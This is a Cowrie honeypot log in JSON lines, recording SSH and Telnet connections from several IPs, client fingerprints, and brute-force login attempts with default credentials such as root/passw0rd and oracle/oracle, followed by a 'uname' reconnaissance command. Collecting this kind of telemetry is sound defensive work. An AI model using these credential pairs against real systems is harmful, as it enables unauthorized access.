{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:28.882148Z","src_ip":"116.196.70.63","session":"126f604cdb4a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-31T04:00:29.842218Z","src_ip":"121.43.208.125","session":"3743870b95d7"}
{"eventid":"cowrie.session.closed","duration":"28.8","message":"Connection lost after 28.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:29.843445Z","src_ip":"121.43.208.125","session":"3743870b95d7"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:00:32.871490Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.session.closed","duration":13.37056827545166,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:33.258963Z","src_ip":"212.227.125.160","session":"085539c37c25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35253,"dst_ip":"1.2.3.4","dst_port":23,"session":"669c580bd843","protocol":"telnet","message":"New connection: 212.227.125.160:35253 (1.2.3.4:23) [session: 669c580bd843]","sensor":"my-vps","timestamp":"2025-08-31T04:00:33.481570Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60004,"dst_ip":"1.2.3.4","dst_port":22,"session":"82e5e4b8ccd0","protocol":"ssh","message":"New connection: 212.227.235.229:60004 (1.2.3.4:22) [session: 82e5e4b8ccd0]","sensor":"my-vps","timestamp":"2025-08-31T04:00:33.571563Z"}
{"eventid":"cowrie.session.closed","duration":13.916543960571289,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:34.770596Z","src_ip":"212.227.125.160","session":"b33ff798baa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35270,"dst_ip":"1.2.3.4","dst_port":23,"session":"4944c917fdb8","protocol":"telnet","message":"New connection: 212.227.125.160:35270 (1.2.3.4:23) [session: 4944c917fdb8]","sensor":"my-vps","timestamp":"2025-08-31T04:00:34.974997Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48864,"dst_ip":"1.2.3.4","dst_port":22,"session":"d32faacf6ec2","protocol":"ssh","message":"New connection: 212.227.235.229:48864 (1.2.3.4:22) [session: d32faacf6ec2]","sensor":"my-vps","timestamp":"2025-08-31T04:00:37.409886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:37.464913Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:00:37.465572Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:38.165099Z","src_ip":"212.227.235.229","session":"d32faacf6ec2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:00:38.165957Z","src_ip":"212.227.235.229","session":"d32faacf6ec2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:00:39.584551Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:00:39.585456Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:41.813377Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.session.closed","duration":"27.4","message":"Connection lost after 27.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:41.814507Z","src_ip":"212.227.125.160","session":"5ce1446b6a78"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:00:44.217919Z","src_ip":"212.227.235.229","session":"d32faacf6ec2"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:46.008598Z","src_ip":"212.227.235.229","session":"d32faacf6ec2"}
{"eventid":"cowrie.session.closed","duration":14.149416446685791,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:47.630906Z","src_ip":"212.227.125.160","session":"669c580bd843"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:00:47.774793Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35468,"dst_ip":"1.2.3.4","dst_port":23,"session":"1476afb01458","protocol":"telnet","message":"New connection: 212.227.125.160:35468 (1.2.3.4:23) [session: 1476afb01458]","sensor":"my-vps","timestamp":"2025-08-31T04:00:47.859721Z"}
{"eventid":"cowrie.session.closed","duration":13.581401109695435,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:48.556333Z","src_ip":"212.227.125.160","session":"4944c917fdb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35475,"dst_ip":"1.2.3.4","dst_port":23,"session":"28fb7da961e9","protocol":"telnet","message":"New connection: 212.227.125.160:35475 (1.2.3.4:23) [session: 28fb7da961e9]","sensor":"my-vps","timestamp":"2025-08-31T04:00:48.848705Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48902,"dst_ip":"1.2.3.4","dst_port":22,"session":"63992e65a53a","protocol":"ssh","message":"New connection: 212.227.125.160:48902 (1.2.3.4:22) [session: 63992e65a53a]","sensor":"my-vps","timestamp":"2025-08-31T04:00:54.010816Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:00:54.351418Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:00:54.352136Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49120,"dst_ip":"1.2.3.4","dst_port":23,"session":"aebbf269d365","protocol":"telnet","message":"New connection: 212.227.125.160:49120 (1.2.3.4:23) [session: aebbf269d365]","sensor":"my-vps","timestamp":"2025-08-31T04:00:58.329870Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38976,"dst_ip":"1.2.3.4","dst_port":22,"session":"49c457bb9c2b","protocol":"ssh","message":"New connection: 212.227.125.160:38976 (1.2.3.4:22) [session: 49c457bb9c2b]","sensor":"my-vps","timestamp":"2025-08-31T04:00:58.374913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:58.624462Z","src_ip":"212.227.125.160","session":"63992e65a53a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:00:58.655003Z","src_ip":"212.227.125.160","session":"63992e65a53a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58968,"dst_ip":"1.2.3.4","dst_port":22,"session":"368267f8692d","protocol":"ssh","message":"New connection: 212.227.235.229:58968 (1.2.3.4:22) [session: 368267f8692d]","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.037749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.043142Z","src_ip":"212.227.235.229","session":"368267f8692d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.125644Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.163379Z","src_ip":"212.227.125.160","session":"49c457bb9c2b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.164726Z","src_ip":"212.227.125.160","session":"49c457bb9c2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.347001Z","src_ip":"212.227.235.229","session":"368267f8692d"}
{"eventid":"cowrie.session.closed","duration":"25.8","message":"Connection lost after 25.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:00:59.413078Z","src_ip":"212.227.235.229","session":"82e5e4b8ccd0"}
{"eventid":"cowrie.login.failed","username":"home","password":"123456770","message":"login attempt [home/123456770] failed","sensor":"my-vps","timestamp":"2025-08-31T04:01:00.563937Z","src_ip":"212.227.235.229","session":"368267f8692d"}
{"eventid":"cowrie.session.closed","duration":12.989089250564575,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:00.848757Z","src_ip":"212.227.125.160","session":"1476afb01458"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:01:01.203363Z","src_ip":"212.227.125.160","session":"49c457bb9c2b"}
{"eventid":"cowrie.session.closed","duration":13.017775535583496,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:01.866424Z","src_ip":"212.227.125.160","session":"28fb7da961e9"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:01.872364Z","src_ip":"212.227.235.229","session":"368267f8692d"}
{"eventid":"cowrie.session.connect","src_ip":"121.43.208.125","src_port":43638,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df0307b344d","protocol":"ssh","message":"New connection: 121.43.208.125:43638 (1.2.3.4:22) [session: 0df0307b344d]","sensor":"my-vps","timestamp":"2025-08-31T04:01:02.075777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-31T04:01:02.088276Z","src_ip":"121.43.208.125","session":"0df0307b344d"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:02.880345Z","src_ip":"212.227.125.160","session":"49c457bb9c2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57874,"dst_ip":"1.2.3.4","dst_port":22,"session":"074c17972a4e","protocol":"ssh","message":"New connection: 212.227.235.229:57874 (1.2.3.4:22) [session: 074c17972a4e]","sensor":"my-vps","timestamp":"2025-08-31T04:01:11.182352Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:21.380967Z","src_ip":"121.43.208.125","session":"8967dedc3c6d"}
{"eventid":"cowrie.session.closed","duration":31.38409996032715,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:29.713902Z","src_ip":"212.227.125.160","session":"aebbf269d365"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:01:30.539934Z","src_ip":"212.227.235.229","session":"074c17972a4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:01:30.540885Z","src_ip":"212.227.235.229","session":"074c17972a4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56280,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bc21f9fa786","protocol":"ssh","message":"New connection: 212.227.235.229:56280 (1.2.3.4:22) [session: 8bc21f9fa786]","sensor":"my-vps","timestamp":"2025-08-31T04:01:36.632438Z"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":38790,"dst_ip":"1.2.3.4","dst_port":22,"session":"a76bceef31ff","protocol":"ssh","message":"New connection: 34.14.223.46:38790 (1.2.3.4:22) [session: a76bceef31ff]","sensor":"my-vps","timestamp":"2025-08-31T04:01:36.788505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:01:36.789508Z","src_ip":"34.14.223.46","session":"a76bceef31ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:01:37.262741Z","src_ip":"34.14.223.46","session":"a76bceef31ff"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:01:37.348278Z","src_ip":"212.227.235.229","session":"8bc21f9fa786"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:01:37.348993Z","src_ip":"212.227.235.229","session":"8bc21f9fa786"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T04:01:38.285653Z","src_ip":"34.14.223.46","session":"a76bceef31ff"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:01:39.765615Z","src_ip":"34.14.223.46","session":"a76bceef31ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51470,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d9047bd8d71","protocol":"ssh","message":"New connection: 212.227.125.160:51470 (1.2.3.4:22) [session: 1d9047bd8d71]","sensor":"my-vps","timestamp":"2025-08-31T04:01:42.899306Z"}
